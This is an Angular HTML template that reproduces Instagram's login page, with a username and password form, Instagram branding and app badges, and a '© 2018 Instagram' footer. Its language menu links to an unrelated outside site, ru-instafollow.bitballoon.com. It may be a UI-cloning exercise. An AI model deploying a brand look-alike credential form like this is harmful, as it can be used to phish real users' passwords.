
<div class="container">
    <div class="box">
        <div class="heading"></div>
        <form class="login-form">
            <div class="field">
                <input name="username" type="name" placeholder="Phone number, username, or email" [(ngModel)] ="username"/>
                <label for="username">Phone number, username, or email</label>
            </div>
            <div class="field">
                <input name="password" type="password" placeholder="password" [(ngModel)]= "password"/>
                <label for="password">Password</label>
            </div>
            <button mat-raised-button color="primary" (click)="Submit()">Log In</button>
            <div class="separator">
                <div class="line"></div>
                <p>OR</p>
                <div class="line"></div>
            </div>
            <div class="other">
                <button class="fb-login-btn" type="button">
                    <i class="fa fa-facebook-official fb-icon"></i>
                    <span class="">Log in with Facebook</span>
                </button>
            </div>
        </form>
    </div>
    <div class="box">
        <p class="missing"> Looks like you are new here or missing something <br><br>
        <button (click)="OnGetStartedClick()" mat-raised-button color="primary">Get Started</button></p>
    </div>
  </div>

  <div class="app">
    <p>Get the app.</p>
    <div class="app-img">
      <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
        <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png" >
      </a>
      <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
        <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png">
      </a>  
    </div>  <!-- App-img end-->
  </div> <!-- App end -->

  <footer class="footer" role="contentinfo">
    <div class="footer-container">

      <nav class="footer-nav" role="navigation">
        <ul>
          <li><a href="">About Us</a></li>
          <li><a href="">Support</a></li>
          <li><a href="">Blog</a></li>
          <li><a href="">Press</a></li>
          <li><a href="">Api</a></li>
          <li><a href="">Jobs</a></li>
          <li><a href="">Privacy</a></li>
          <li><a href="">Terms</a></li>
          <li><a href="">Directory</a></li>
          <li>
            <span class="language">Language
              <select name="language" class="select" onchange="la(this.value)">
                <option value="#">English</option>
                <option value="http://ru-instafollow.bitballoon.com">Russian</option>
              </select>
            </span>
          </li>
        </ul>
      </nav>

      <span class="footer-logo">&copy; 2018 Instagram</span>
    </div> <!-- Footer container end -->
  </footer>
